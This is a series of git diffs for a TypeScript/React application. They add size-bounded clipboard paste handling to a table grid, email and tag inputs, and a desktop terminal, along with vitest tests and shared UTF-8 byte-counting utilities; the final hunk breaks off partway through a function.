         rowIndex: currentAnchor.rowIndex + pasteRows.length - 1,
-        colIndex: Math.min(currentAnchor.colIndex + maxPasteCols - 1, currentCols.length - 1),
+        colIndex: Math.min(
+          currentAnchor.colIndex + parsedPaste.maxColumns - 1,
+          currentCols.length - 1
+        ),
       })
     }
 
@@ -4589,7 +4606,11 @@ export function TableGrid({
   }
 
   return (
-    <div ref={containerRef} className='flex h-full flex-col overflow-hidden'>
+    <div
+      ref={containerRef}
+      data-paste-max-bytes={PASTE_LIMITS.STRUCTURED_BYTES}
+      className='flex h-full flex-col overflow-hidden'
+    >
       <div className='relative flex min-h-0 flex-1'>
         {findOpen && (
           <FindBar

--- a/apps/sim/app/workspace/[workspaceId]/tables/[tableId]/components/table-grid/table-paste.test.ts
+++ b/apps/sim/app/workspace/[workspaceId]/tables/[tableId]/components/table-grid/table-paste.test.ts
@@ -1,0 +1,32 @@
+import { describe, expect, it } from 'vitest'
+import { exceedsTablePasteRowLimit, parseBoundedTsv } from './table-paste'
+
+describe('parseBoundedTsv', () => {
+  it('parses LF and CRLF rows and drops one trailing empty row', () => {
+    expect(parseBoundedTsv('a\tb\r\nc\td\n', 2)).toEqual({
+      rows: [
+        ['a', 'b'],
+        ['c', 'd'],
+      ],
+      maxColumns: 2,
+    })
+  })
+
+  it('does not retain cells beyond the available grid columns', () => {
+    expect(parseBoundedTsv('a\tb\tc\td', 2)).toEqual({
+      rows: [['a', 'b']],
+      maxColumns: 2,
+    })
+  })
+
+  it('preserves an intentional empty final cell', () => {
+    expect(parseBoundedTsv('a\t', 2)).toEqual({ rows: [['a', '']], maxColumns: 2 })
+  })
+})
+
+describe('exceedsTablePasteRowLimit', () => {
+  it('does not count a trailing row separator as an extra row', () => {
+    expect(exceedsTablePasteRowLimit('a\nb\n', 2)).toBe(false)
+    expect(exceedsTablePasteRowLimit('a\nb\nc', 2)).toBe(true)
+  })
+})

--- a/apps/sim/app/workspace/[workspaceId]/tables/[tableId]/components/table-grid/table-paste.test.ts
+++ b/apps/sim/app/workspace/[workspaceId]/tables/[tableId]/components/table-grid/table-paste.test.ts
@@ -22,6 +22,13 @@ describe('parseBoundedTsv', () => {
   it('preserves an intentional empty final cell', () => {
     expect(parseBoundedTsv('a\t', 2)).toEqual({ rows: [['a', '']], maxColumns: 2 })
   })
+
+  it('preserves interior blank rows and classic Mac row separators', () => {
+    expect(parseBoundedTsv('a\r\rb', 2)).toEqual({
+      rows: [['a'], [''], ['b']],
+      maxColumns: 1,
+    })
+  })
 })
 
 describe('exceedsTablePasteRowLimit', () => {

--- a/apps/sim/app/workspace/[workspaceId]/tables/[tableId]/components/table-grid/table-paste.ts
+++ b/apps/sim/app/workspace/[workspaceId]/tables/[tableId]/components/table-grid/table-paste.ts
@@ -21,47 +21,31 @@ export function parseBoundedTsv(text: string, columnLimit: number): ParsedTableP
   if (!text || columnLimit < 1) return { rows: [], maxColumns: 0 }
 
   const rows: string[][] = []
-  let row: string[] = []
-  let column = 0
-  let cellStart = 0
   let maxColumns = 0
-
-  const finishCell = (end: number) => {
-    if (column < columnLimit) row.push(text.slice(cellStart, end))
-    column += 1
-  }
-
-  const finishRow = () => {
-    if (row.length > 0) {
-      maxColumns = Math.max(maxColumns, row.length)
-      rows.push(row)
-    }
-    row = []
-    column = 0
-  }
-
-  for (let index = 0; index <= text.length; index++) {
-    if (index === text.length) {
-      if (cellStart < text.length || column > 0) {
-        finishCell(index)
-        finishRow()
+  const pushRow = (rowStart: number, rowEnd: number) => {
+    const row: string[] = []
+    let cellStart = rowStart
+    while (row.length < columnLimit) {
+      const tab = text.indexOf('\t', cellStart)
+      if (tab < 0 || tab >= rowEnd) {
+        row.push(text.slice(cellStart, rowEnd))
+        break
       }
-      break
+      row.push(text.slice(cellStart, tab))
+      cellStart = tab + 1
     }
-
-    const code = text.charCodeAt(index)
-    if (code === 9) {
-      finishCell(index)
-      cellStart = index + 1
-      continue
-    }
-    if (code !== 10 && code !== 13) continue
-
-    finishCell(index)
-    finishRow()
-    if (code === 13 && text.charCodeAt(index + 1) === 10) index += 1
-    cellStart = index + 1
+    maxColumns = Math.max(maxColumns, row.length)
+    rows.push(row)
   }
+
+  let rowStart = 0
+  const rowBreak = /\r\n|\r|\n/g
+  let match: RegExpExecArray | null
+  while ((match = rowBreak.exec(text))) {
+    pushRow(rowStart, match.index)
+    rowStart = rowBreak.lastIndex
+  }
+  if (rowStart < text.length) pushRow(rowStart, text.length)
 
   return { rows, maxColumns }
 }

--- a/apps/sim/app/workspace/[workspaceId]/tables/[tableId]/components/table-grid/table-paste.ts
+++ b/apps/sim/app/workspace/[workspaceId]/tables/[tableId]/components/table-grid/table-paste.ts
@@ -1,0 +1,67 @@
+import { countPasteRows } from '@sim/utils/paste'
+
+export interface ParsedTablePaste {
+  rows: string[][]
+  maxColumns: number
+}
+
+/** Matches {@link parseBoundedTsv}: a final row separator does not create an empty pasted row. */
+export function exceedsTablePasteRowLimit(text: string, maxRows: number): boolean {
+  const hasTrailingRowBreak = text.endsWith('\n') || text.endsWith('\r')
+  const rowCount = countPasteRows(text, maxRows + 1) - (hasTrailingRowBreak ? 1 : 0)
+  return rowCount > maxRows
+}
+
+/**
+ * Parses the table's intentionally simple TSV clipboard format while retaining only columns that can
+ * land in the grid. `String.split()` materializes every ignored cell, so a single tab-heavy line can
+ * otherwise allocate an unbounded array before the editor notices it has no corresponding columns.
+ */
+export function parseBoundedTsv(text: string, columnLimit: number): ParsedTablePaste {
+  if (!text || columnLimit < 1) return { rows: [], maxColumns: 0 }
+
+  const rows: string[][] = []
+  let row: string[] = []
+  let column = 0
+  let cellStart = 0
+  let maxColumns = 0
+
+  const finishCell = (end: number) => {
+    if (column < columnLimit) row.push(text.slice(cellStart, end))
+    column += 1
+  }
+
+  const finishRow = () => {
+    if (row.length > 0) {
+      maxColumns = Math.max(maxColumns, row.length)
+      rows.push(row)
+    }
+    row = []
+    column = 0
+  }
+
+  for (let index = 0; index <= text.length; index++) {
+    if (index === text.length) {
+      if (cellStart < text.length || column > 0) {
+        finishCell(index)
+        finishRow()
+      }
+      break
+    }
+
+    const code = text.charCodeAt(index)
+    if (code === 9) {
+      finishCell(index)
+      cellStart = index + 1
+      continue
+    }
+    if (code !== 10 && code !== 13) continue
+
+    finishCell(index)
+    finishRow()
+    if (code === 13 && text.charCodeAt(index + 1) === 10) index += 1
+    cellStart = index + 1
+  }
+
+  return { rows, maxColumns }
+}

--- a/apps/sim/components/settings/standalone-settings-shell.tsx
+++ b/apps/sim/components/settings/standalone-settings-shell.tsx
@@ -1,7 +1,6 @@
 'use client'
 
 import type { ReactNode } from 'react'
-import { ToastProvider } from '@sim/emcn'
 import { usePathname } from 'next/navigation'
 import {
   ACCOUNT_SETTINGS_GROUPS,
@@ -134,33 +133,31 @@ export function StandaloneSettingsShell(props: StandaloneSettingsShellProps) {
     )
 
   return (
-    <ToastProvider>
+    <div className='flex h-screen w-full overflow-hidden bg-[var(--surface-1)]'>
       {/*
         Mirrors the in-workspace chrome (WorkspaceChrome): a flush, borderless
         sidebar column against the app surface, and only the content pane
         carrying the rounded border. Keep the two in step — a settings page
         should look the same whether it is reached inside a workspace or not.
       */}
-      <div className='flex h-screen w-full overflow-hidden bg-[var(--surface-1)]'>
-        <aside
-          style={{ width: SIDEBAR_WIDTH.DEFAULT }}
-          className='flex h-full flex-shrink-0 flex-col overflow-hidden bg-[var(--surface-1)] pt-3'
-          aria-label={`${SETTINGS_PLANE_CHROME[plane].label} settings navigation`}
-        >
-          {sidebar}
-        </aside>
-        <div className='flex min-w-0 flex-1 flex-col p-[8px] pl-0'>
-          <main className='flex-1 overflow-hidden rounded-[8px] border border-[var(--border)] bg-[var(--bg)]'>
-            <SettingsHeaderProvider>
-              <SettingsHeaderShell>
-                <SettingsSectionProvider plane={plane} section={activeSection}>
-                  {children}
-                </SettingsSectionProvider>
-              </SettingsHeaderShell>
-            </SettingsHeaderProvider>
-          </main>
-        </div>
+      <aside
+        style={{ width: SIDEBAR_WIDTH.DEFAULT }}
+        className='flex h-full flex-shrink-0 flex-col overflow-hidden bg-[var(--surface-1)] pt-3'
+        aria-label={`${SETTINGS_PLANE_CHROME[plane].label} settings navigation`}
+      >
+        {sidebar}
+      </aside>
+      <div className='flex min-w-0 flex-1 flex-col p-[8px] pl-0'>
+        <main className='flex-1 overflow-hidden rounded-[8px] border border-[var(--border)] bg-[var(--bg)]'>
+          <SettingsHeaderProvider>
+            <SettingsHeaderShell>
+              <SettingsSectionProvider plane={plane} section={activeSection}>
+                {children}
+              </SettingsSectionProvider>
+            </SettingsHeaderShell>
+          </SettingsHeaderProvider>
+        </main>
       </div>
-    </ToastProvider>
+    </div>
   )
 }

--- a/apps/sim/lib/api/contracts/file-doc.ts
+++ b/apps/sim/lib/api/contracts/file-doc.ts
@@ -44,7 +44,7 @@ export const mergeFileDocBodySchema = z.object({
   /**
    * Base64-encoded `Y.encodeStateAsUpdate` of the live document as the relay currently holds it. The
    * bound is generous headroom over a max-size collab doc's Yjs state (base64-inflated), not a tuned
-   * limit — collab is gated to ≤256 KB documents client-side.
+   * limit — collaborative documents are gated to 5 MiB of markdown client-side.
    */
   docState: z
     .string()
@@ -89,7 +89,8 @@ export const persistFileDocBodySchema = z.object({
   userId: z.string().min(1, 'userId is required'),
   /**
    * Base64-encoded `Y.encodeStateAsUpdate` of the live document as the relay currently holds it — the
-   * bound matches the merge contract (generous base64 headroom over a ≤256 KB collab doc's Yjs state).
+   * bound matches the merge contract (generous base64 headroom over a 5 MiB collab document's Yjs
+   * state).
    */
   docState: z
     .string()

--- a/apps/sim/lib/terminal/transport.ts
+++ b/apps/sim/lib/terminal/transport.ts
@@ -13,6 +13,7 @@ import {
   type DesktopZoomPercent,
   isPendingDesktopScopeId,
   type SimDesktopTerminalApi,
+  type TerminalPasteResult,
   type TerminalShortcutCommand,
 } from '@sim/desktop-bridge'
 import type {
@@ -241,7 +242,7 @@ export function writeToTerminal(
 export async function pasteIntoTerminal(
   terminalId: string,
   scopeId = currentTerminalScopeId()
-): Promise<boolean> {
+): Promise<TerminalPasteResult> {
   return (await bridge()?.paste(terminalId, scopeId)) ?? false
 }
 

--- a/packages/desktop-bridge/contract-snapshot.ts
+++ b/packages/desktop-bridge/contract-snapshot.ts
@@ -823,6 +823,9 @@ export interface ScopedTerminalCommandEvent extends TerminalCommandEvent {
 
 export const PENDING_DESKTOP_SCOPE_PREFIX = 'pending:' as const
 
+/** Boolean results preserve compatibility with older installed desktop shells. */
+export type TerminalPasteResult = boolean | 'too-large'
+
 const DESKTOP_SCOPE_PATTERN = /^[A-Za-z0-9_-]{1,128}$/
 const PENDING_DESKTOP_SCOPE_PATTERN = /^pending:[A-Za-z0-9_-]{1,128}$/
 
@@ -869,7 +872,7 @@ export interface SimDesktopTerminalApi {
    * only replay what the user already copied instead of choosing the bytes.
    * Resolves false when the clipboard held nothing to paste.
    */
-  paste(terminalId: string, scopeId: string): Promise<boolean>
+  paste(terminalId: string, scopeId: string): Promise<TerminalPasteResult>
   resize(terminalId: string, cols: number, rows: number, scopeId: string): void
   /** Open an additional terminal and make it active. */
   openTerminal(cwd: string | undefined, scopeId: string): Promise<ScopedTerminalTabsState>

--- a/packages/desktop-bridge/src/index.ts
+++ b/packages/desktop-bridge/src/index.ts
@@ -25,6 +25,9 @@ import type {
 
 export const PENDING_DESKTOP_SCOPE_PREFIX = 'pending:' as const
 
+/** Boolean results preserve compatibility with older installed desktop shells. */
+export type TerminalPasteResult = boolean | 'too-large'
+
 const DESKTOP_SCOPE_PATTERN = /^[A-Za-z0-9_-]{1,128}$/
 const PENDING_DESKTOP_SCOPE_PATTERN = /^pending:[A-Za-z0-9_-]{1,128}$/
 
@@ -71,7 +74,7 @@ export interface SimDesktopTerminalApi {
    * only replay what the user already copied instead of choosing the bytes.
    * Resolves false when the clipboard held nothing to paste.
    */
-  paste(terminalId: string, scopeId: string): Promise<boolean>
+  paste(terminalId: string, scopeId: string): Promise<TerminalPasteResult>
   resize(terminalId: string, cols: number, rows: number, scopeId: string): void
   /** Open an additional terminal and make it active. */
   openTerminal(cwd: string | undefined, scopeId: string): Promise<ScopedTerminalTabsState>

--- a/packages/emcn/src/components/chip-emails-input/chip-emails-input.test.tsx
+++ b/packages/emcn/src/components/chip-emails-input/chip-emails-input.test.tsx
@@ -1,0 +1,36 @@
+/**
+ * @vitest-environment jsdom
+ */
+import { act } from 'react'
+import { createRoot, type Root } from 'react-dom/client'
+import { afterEach, beforeEach, expect, it, vi } from 'vitest'
+import { ChipEmailsInput } from './chip-emails-input'
+
+let host: HTMLDivElement
+let root: Root
+
+beforeEach(() => {
+  host = document.createElement('div')
+  document.body.appendChild(host)
+  root = createRoot(host)
+})
+
+afterEach(() => {
+  act(() => root.unmount())
+  host.remove()
+})
+
+it('commits a multi-email paste with one state callback', () => {
+  const onChange = vi.fn()
+  act(() => root.render(<ChipEmailsInput value={[]} onChange={onChange} />))
+  const input = host.querySelector('input') as HTMLInputElement
+  const event = new Event('paste', { bubbles: true, cancelable: true })
+  Object.defineProperty(event, 'clipboardData', {
+    value: { getData: () => 'one@example.com two@example.com three@example.com' },
+  })
+
+  act(() => input.dispatchEvent(event))
+
+  expect(onChange).toHaveBeenCalledOnce()
+  expect(onChange).toHaveBeenCalledWith(['one@example.com', 'two@example.com', 'three@example.com'])
+})

--- a/packages/emcn/src/components/chip-emails-input/chip-emails-input.tsx
+++ b/packages/emcn/src/components/chip-emails-input/chip-emails-input.tsx
@@ -117,38 +117,55 @@ export function ChipEmailsInput({
     setItems(itemsRef.current)
   }, [value])
 
-  const handleAdd = React.useCallback(
-    (raw: string): boolean => {
+  function addValues(rawValues: string[]): boolean[] {
+    const current = itemsRef.current
+    const seen = new Set(current.map((item) => item.value))
+    const next = [...current]
+    const results: boolean[] = []
+    let acceptedChanged = false
+
+    for (const raw of rawValues) {
       const email = normalizeEmail(raw)
-      if (!email) return false
-      const current = itemsRef.current
-      if (current.some((item) => item.value === email)) return false
+      if (!email || seen.has(email)) {
+        results.push(false)
+        continue
+      }
+      seen.add(email)
 
       if (!isValidEmailSyntax(email, allowDomains)) {
-        commitItems([
-          ...current,
-          {
-            value: email,
-            isValid: false,
-            error: allowDomains ? 'Invalid email or domain' : 'Invalid email format',
-          },
-        ])
-        return false
+        next.push({
+          value: email,
+          isValid: false,
+          error: allowDomains ? 'Invalid email or domain' : 'Invalid email format',
+        })
+        results.push(false)
+        continue
       }
 
       const reason = validate?.(email)
       if (reason) {
-        commitItems([...current, { value: email, isValid: false, error: reason }])
-        return false
+        next.push({ value: email, isValid: false, error: reason })
+        results.push(false)
+        continue
       }
 
-      const next = [...current, { value: email, isValid: true }]
-      commitItems(next)
+      next.push({ value: email, isValid: true })
+      results.push(true)
+      acceptedChanged = true
+    }
+
+    if (next.length !== current.length) commitItems(next)
+    if (acceptedChanged) {
       onChange(next.filter((item) => item.isValid).map((item) => item.value))
-      return true
-    },
-    [validate, onChange, commitItems, allowDomains]
-  )
+    }
+    return results
+  }
+
+  const handleAdd = (raw: string): boolean => addValues([raw])[0] ?? false
+
+  const handleAddMany = (rawValues: string[]) => {
+    addValues(rawValues)
+  }
 
   const handleRemove = React.useCallback(
     (_removed: string, index: number) => {
@@ -168,6 +185,7 @@ export function ChipEmailsInput({
       variant={variant}
       items={items}
       onAdd={handleAdd}
+      onAddMany={handleAddMany}
       onRemove={handleRemove}
       placeholder={placeholder}
       placeholderWithTags={placeholderWithTags ?? derivePlaceholderWithTags(placeholder)}

--- a/packages/emcn/src/components/tag-input/tag-input.test.tsx
+++ b/packages/emcn/src/components/tag-input/tag-input.test.tsx
@@ -1,0 +1,40 @@
+/**
+ * @vitest-environment jsdom
+ */
+import { act } from 'react'
+import { createRoot, type Root } from 'react-dom/client'
+import { afterEach, beforeEach, expect, it, vi } from 'vitest'
+import { TagInput } from './tag-input'
+
+let host: HTMLDivElement
+let root: Root
+
+beforeEach(() => {
+  host = document.createElement('div')
+  document.body.appendChild(host)
+  root = createRoot(host)
+})
+
+afterEach(() => {
+  act(() => root.unmount())
+  host.remove()
+})
+
+it('deduplicates and sends a paste through one batch callback', () => {
+  const onAdd = vi.fn(() => true)
+  const onAddMany = vi.fn()
+  act(() => {
+    root.render(<TagInput items={[]} onAdd={onAdd} onAddMany={onAddMany} onRemove={vi.fn()} />)
+  })
+  const input = host.querySelector('input') as HTMLInputElement
+  const event = new Event('paste', { bubbles: true, cancelable: true })
+  Object.defineProperty(event, 'clipboardData', {
+    value: { getData: () => 'one@example.com, two@example.com one@example.com' },
+  })
+
+  act(() => input.dispatchEvent(event))
+
+  expect(onAddMany).toHaveBeenCalledOnce()
+  expect(onAddMany).toHaveBeenCalledWith(['one@example.com', 'two@example.com'])
+  expect(onAdd).not.toHaveBeenCalled()
+})

--- a/packages/emcn/src/components/tag-input/tag-input.tsx
+++ b/packages/emcn/src/components/tag-input/tag-input.tsx
@@ -117,6 +117,8 @@ interface TagInputProps extends VariantProps<typeof tagInputVariants> {
    * Return true if the value was valid and added, false if invalid.
    */
   onAdd: (value: string) => boolean
+  /** Batch counterpart used by paste/file import to avoid one render per value. */
+  onAddMany?: (values: string[]) => void
   /** Callback when a tag is removed (receives value, index, and isValid) */
   onRemove: (value: string, index: number, isValid: boolean) => void
   /** Callback when the input value changes (useful for clearing errors) */
@@ -212,6 +214,7 @@ const TagInput = React.forwardRef<HTMLInputElement, TagInputProps>(
     {
       items,
       onAdd,
+      onAddMany,
       onRemove,
       onInputChange,
       placeholder = 'Enter values',
@@ -255,11 +258,12 @@ const TagInput = React.forwardRef<HTMLInputElement, TagInputProps>(
           const extractValues = fileInputOptions?.extractValues
           if (extractValues) {
             const values = extractValues(text)
-            values.forEach((value) => onAdd(value))
+            if (onAddMany) onAddMany(values)
+            else values.forEach((value) => onAdd(value))
           }
         } catch {}
       },
-      [fileInputOptions?.extractValues, onAdd]
+      [fileInputOptions?.extractValues, onAdd, onAddMany]
     )
 
     const handleDragOver = React.useCallback(
@@ -346,12 +350,18 @@ const TagInput = React.forwardRef<HTMLInputElement, TagInputProps>(
       (e: React.ClipboardEvent<HTMLInputElement>) => {
         e.preventDefault()
         const pastedText = e.clipboardData.getData('text')
-        const pastedValues = pastedText.split(/[\s,;]+/).filter(Boolean)
-        pastedValues.forEach((value) => {
-          onAdd(value.trim())
-        })
+        const pastedValues = Array.from(
+          new Set(
+            pastedText
+              .split(/[\s,;]+/)
+              .map((value) => value.trim())
+              .filter(Boolean)
+          )
+        )
+        if (onAddMany) onAddMany(pastedValues)
+        else pastedValues.forEach((value) => onAdd(value))
       },
-      [onAdd]
+      [onAdd, onAddMany]
     )
 
     const handleBlur = React.useCallback(() => {

--- a/packages/utils/package.json
+++ b/packages/utils/package.json
@@ -54,6 +54,10 @@
       "types": "./src/retry.ts",
       "default": "./src/retry.ts"
     },
+    "./paste": {
+      "types": "./src/paste.ts",
+      "default": "./src/paste.ts"
+    },
     "./sso-domain": {
       "types": "./src/sso-domain.ts",
       "default": "./src/sso-domain.ts"

--- a/packages/utils/src/index.ts
+++ b/packages/utils/src/index.ts
@@ -24,6 +24,17 @@ export {
   toRecordOrNull,
 } from './object'
 export {
+  assessTextPaste,
+  countPasteRows,
+  formatPasteLimit,
+  PASTE_LIMITS,
+  type TextPasteAdmission,
+  type TextPasteAdmissionInput,
+  type TextPasteRejectionReason,
+  utf8ByteLength,
+  utf8ByteLengthRange,
+} from './paste'
+export {
   generateRandomBytes,
   generateRandomHex,
   generateRandomString,

--- a/packages/utils/src/paste.test.ts
+++ b/packages/utils/src/paste.test.ts
@@ -52,6 +52,12 @@ describe('assessTextPaste', () => {
     })
   })
 
+  it('accepts payloads with worst-case UTF-8 headroom without measuring exact bytes', () => {
+    expect(assessTextPaste({ pastedText: '💡'.repeat(100), maxPastedBytes: 1_000 })).toEqual({
+      accepted: true,
+    })
+  })
+
   it('rejects a projected result above its character limit', () => {
     expect(
       assessTextPaste({

--- a/packages/utils/src/paste.test.ts
+++ b/packages/utils/src/paste.test.ts
@@ -1,0 +1,82 @@
+import { describe, expect, it } from 'vitest'
+import {
+  assessTextPaste,
+  countPasteRows,
+  formatPasteLimit,
+  utf8ByteLength,
+  utf8ByteLengthRange,
+} from './paste'
+
+describe('utf8ByteLength', () => {
+  it('matches UTF-8 for ASCII, BMP, astral, and malformed UTF-16', () => {
+    for (const value of ['plain text', 'café', '你好', '💡', '\ud800']) {
+      expect(utf8ByteLength(value)).toBe(new TextEncoder().encode(value).byteLength)
+    }
+  })
+
+  it('short-circuits once the limit is exceeded', () => {
+    expect(utf8ByteLength('a'.repeat(1_000_000), 100)).toBe(101)
+  })
+
+  it('measures a range without slicing the source', () => {
+    expect(utf8ByteLengthRange('a💡b', 1, 3)).toBe(4)
+  })
+})
+
+describe('assessTextPaste', () => {
+  it('accepts a selection replacement at the projected boundary', () => {
+    expect(
+      assessTextPaste({
+        pastedText: '💡',
+        currentText: '123456',
+        selectionStart: 1,
+        selectionEnd: 5,
+        maxResultBytes: 6,
+      })
+    ).toMatchObject({ accepted: true, resultBytes: 6 })
+  })
+
+  it('rejects payload characters before scanning bytes', () => {
+    expect(
+      assessTextPaste({ pastedText: 'abc', maxPastedCharacters: 2, maxPastedBytes: 100 })
+    ).toEqual({ accepted: false, reason: 'pasted-characters', actual: 3, limit: 2 })
+  })
+
+  it('rejects non-ASCII payloads by exact byte size', () => {
+    expect(assessTextPaste({ pastedText: '💡', maxPastedBytes: 3 })).toEqual({
+      accepted: false,
+      reason: 'pasted-bytes',
+      actual: 4,
+      limit: 3,
+    })
+  })
+
+  it('rejects a projected result above its character limit', () => {
+    expect(
+      assessTextPaste({
+        pastedText: 'xyz',
+        currentText: 'abcd',
+        selectionStart: 1,
+        selectionEnd: 2,
+        maxResultCharacters: 5,
+      })
+    ).toEqual({ accepted: false, reason: 'result-characters', actual: 6, limit: 5 })
+  })
+})
+
+describe('countPasteRows', () => {
+  it('handles LF, CRLF, and CR without allocating rows', () => {
+    expect(countPasteRows('a\nb\r\nc\rd')).toBe(4)
+    expect(countPasteRows('')).toBe(0)
+  })
+
+  it('short-circuits above a row ceiling', () => {
+    expect(countPasteRows('a\nb\nc\nd', 2)).toBe(3)
+  })
+})
+
+it('formats binary paste limits', () => {
+  expect(formatPasteLimit(256 * 1024)).toBe('256 KiB')
+  expect(formatPasteLimit(1_000_000)).toBe('1 MB')
+  expect(formatPasteLimit(5 * 1024 * 1024)).toBe('5 MiB')
+})

--- a/packages/utils/src/paste.test.ts
+++ b/packages/utils/src/paste.test.ts
@@ -3,6 +3,7 @@ import {
   assessTextPaste,
   countPasteRows,
   formatPasteLimit,
+  PASTE_LIMITS,
   utf8ByteLength,
   utf8ByteLengthRange,
 } from './paste'
@@ -79,4 +80,11 @@ it('formats binary paste limits', () => {
   expect(formatPasteLimit(256 * 1024)).toBe('256 KiB')
   expect(formatPasteLimit(1_000_000)).toBe('1 MB')
   expect(formatPasteLimit(5 * 1024 * 1024)).toBe('5 MiB')
+})
+
+it('keeps non-contract paste ceilings in crash-only territory', () => {
+  expect(PASTE_LIMITS.DEFAULT_BYTES).toBe(32 * 1024 * 1024)
+  expect(PASTE_LIMITS.TEXT_EDITOR_BYTES).toBe(32 * 1024 * 1024)
+  expect(PASTE_LIMITS.TERMINAL_BYTES).toBe(8 * 1024 * 1024)
+  expect(PASTE_LIMITS.STRUCTURED_BYTES).toBe(32 * 1024 * 1024)
 })

--- a/packages/utils/src/paste.ts
+++ b/packages/utils/src/paste.ts
@@ -1,18 +1,18 @@
 export const PASTE_LIMITS = {
-  /** Fallback for controls without a more specific downstream contract. */
-  DEFAULT_BYTES: 1_000_000,
-  /** Matches the realtime collaboration transport's single-message boundary. */
-  RICH_MARKDOWN_BYTES: 1_000_000,
-  /** Matches the existing inline CSV editor boundary. */
-  TEXT_EDITOR_BYTES: 5 * 1024 * 1024,
+  /** Crash-only fallback for controls without a more specific downstream contract. */
+  DEFAULT_BYTES: 32 * 1024 * 1024,
+  /** Matches the existing collaborative-document seed boundary. */
+  RICH_MARKDOWN_BYTES: 5 * 1024 * 1024,
+  /** Stays below the 50 MiB JSON request boundary while allowing genuinely large source files. */
+  TEXT_EDITOR_BYTES: 32 * 1024 * 1024,
   /** Matches the deployed chat request contract. */
   CHAT_CHARACTERS: 1_000_000,
   /** A Unicode scalar can occupy at most four UTF-8 bytes. */
   CHAT_BYTES: 4_000_000,
-  /** Keeps a single terminal input below the Socket.IO single-message boundary. */
-  TERMINAL_BYTES: 1_000_000,
-  /** Allows a sizeable grid while row and cell limits provide the primary bound. */
-  STRUCTURED_BYTES: 5 * 1024 * 1024,
+  /** Crash-only bound; admitted input is streamed to the PTY in 64 KiB chunks. */
+  TERMINAL_BYTES: 8 * 1024 * 1024,
+  /** The server's row ceiling remains the primary table bound. */
+  STRUCTURED_BYTES: 32 * 1024 * 1024,
 } as const
 
 export const PASTE_RENDER_THRESHOLDS = {

--- a/packages/utils/src/paste.ts
+++ b/packages/utils/src/paste.ts
@@ -1,0 +1,225 @@
+export const PASTE_LIMITS = {
+  /** Fallback for controls without a more specific downstream contract. */
+  DEFAULT_BYTES: 1_000_000,
+  /** Matches the realtime collaboration transport's single-message boundary. */
+  RICH_MARKDOWN_BYTES: 1_000_000,
+  /** Matches the existing inline CSV editor boundary. */
+  TEXT_EDITOR_BYTES: 5 * 1024 * 1024,
+  /** Matches the deployed chat request contract. */
+  CHAT_CHARACTERS: 1_000_000,
+  /** A Unicode scalar can occupy at most four UTF-8 bytes. */
+  CHAT_BYTES: 4_000_000,
+  /** Keeps a single terminal input below the Socket.IO single-message boundary. */
+  TERMINAL_BYTES: 1_000_000,
+  /** Allows a sizeable grid while row and cell limits provide the primary bound. */
+  STRUCTURED_BYTES: 5 * 1024 * 1024,
+} as const
+
+export const PASTE_RENDER_THRESHOLDS = {
+  /** Above this size, skip decorative parsing and render a native text surface. */
+  ENHANCED_TEXT_CHARACTERS: 256 * 1024,
+} as const
+
+export interface TextPasteAdmissionInput {
+  pastedText: string
+  /** Maximum UTF-8 bytes allowed in the clipboard payload itself. */
+  maxPastedBytes?: number
+  /** Maximum UTF-16 code units allowed in the clipboard payload itself. */
+  maxPastedCharacters?: number
+  /** Existing value when the projected post-paste value must also be bounded. */
+  currentText?: string
+  /** Selection offsets within {@link currentText}. */
+  selectionStart?: number
+  selectionEnd?: number
+  /** Maximum UTF-8 bytes allowed after replacing the selection. */
+  maxResultBytes?: number
+  /** Maximum UTF-16 code units allowed after replacing the selection. */
+  maxResultCharacters?: number
+}
+
+export type TextPasteRejectionReason =
+  | 'pasted-bytes'
+  | 'pasted-characters'
+  | 'result-bytes'
+  | 'result-characters'
+
+export type TextPasteAdmission =
+  | {
+      accepted: true
+      pastedBytes?: number
+      resultBytes?: number
+      resultCharacters?: number
+    }
+  | {
+      accepted: false
+      reason: TextPasteRejectionReason
+      actual: number
+      limit: number
+    }
+
+/**
+ * Measures UTF-8 without allocating the second full-size buffer that `TextEncoder.encode()` creates.
+ * When `stopAfter` is supplied, the scan exits as soon as the caller already knows the value is too
+ * large. Lone UTF-16 surrogates match `TextEncoder` and count as the three-byte replacement scalar.
+ */
+export function utf8ByteLengthRange(
+  value: string,
+  start = 0,
+  end = value.length,
+  stopAfter = Number.POSITIVE_INFINITY
+): number {
+  let bytes = 0
+  const safeStart = Math.min(Math.max(start, 0), value.length)
+  const safeEnd = Math.min(Math.max(end, safeStart), value.length)
+
+  for (let index = safeStart; index < safeEnd; index++) {
+    const code = value.charCodeAt(index)
+    if (code <= 0x7f) {
+      bytes += 1
+    } else if (code <= 0x7ff) {
+      bytes += 2
+    } else if (code >= 0xd800 && code <= 0xdbff) {
+      const next = value.charCodeAt(index + 1)
+      if (index + 1 < safeEnd && next >= 0xdc00 && next <= 0xdfff) {
+        bytes += 4
+        index += 1
+      } else {
+        bytes += 3
+      }
+    } else {
+      bytes += 3
+    }
+
+    if (bytes > stopAfter) return bytes
+  }
+
+  return bytes
+}
+
+export function utf8ByteLength(value: string, stopAfter = Number.POSITIVE_INFINITY): number {
+  return utf8ByteLengthRange(value, 0, value.length, stopAfter)
+}
+
+function normalizedSelection(input: TextPasteAdmissionInput): {
+  currentText: string
+  start: number
+  end: number
+} {
+  const currentText = input.currentText ?? ''
+  const rawStart = input.selectionStart ?? currentText.length
+  const rawEnd = input.selectionEnd ?? rawStart
+  const start = Math.min(Math.max(Math.min(rawStart, rawEnd), 0), currentText.length)
+  const end = Math.min(Math.max(Math.max(rawStart, rawEnd), start), currentText.length)
+  return { currentText, start, end }
+}
+
+/**
+ * Applies the common text-paste policy before an editor parses, tokenizes, renders, or persists the
+ * payload. Character checks are constant-time. Byte scans short-circuit at the configured ceiling and
+ * never allocate a full encoded copy of the clipboard string.
+ */
+export function assessTextPaste(input: TextPasteAdmissionInput): TextPasteAdmission {
+  const { pastedText } = input
+
+  if (input.maxPastedCharacters !== undefined && pastedText.length > input.maxPastedCharacters) {
+    return {
+      accepted: false,
+      reason: 'pasted-characters',
+      actual: pastedText.length,
+      limit: input.maxPastedCharacters,
+    }
+  }
+
+  if (input.maxPastedBytes !== undefined && pastedText.length > input.maxPastedBytes) {
+    return {
+      accepted: false,
+      reason: 'pasted-bytes',
+      actual: pastedText.length,
+      limit: input.maxPastedBytes,
+    }
+  }
+
+  const pastedByteLimit = Math.max(input.maxPastedBytes ?? 0, input.maxResultBytes ?? 0)
+  const pastedBytes = pastedByteLimit > 0 ? utf8ByteLength(pastedText, pastedByteLimit) : undefined
+
+  if (
+    input.maxPastedBytes !== undefined &&
+    pastedBytes !== undefined &&
+    pastedBytes > input.maxPastedBytes
+  ) {
+    return {
+      accepted: false,
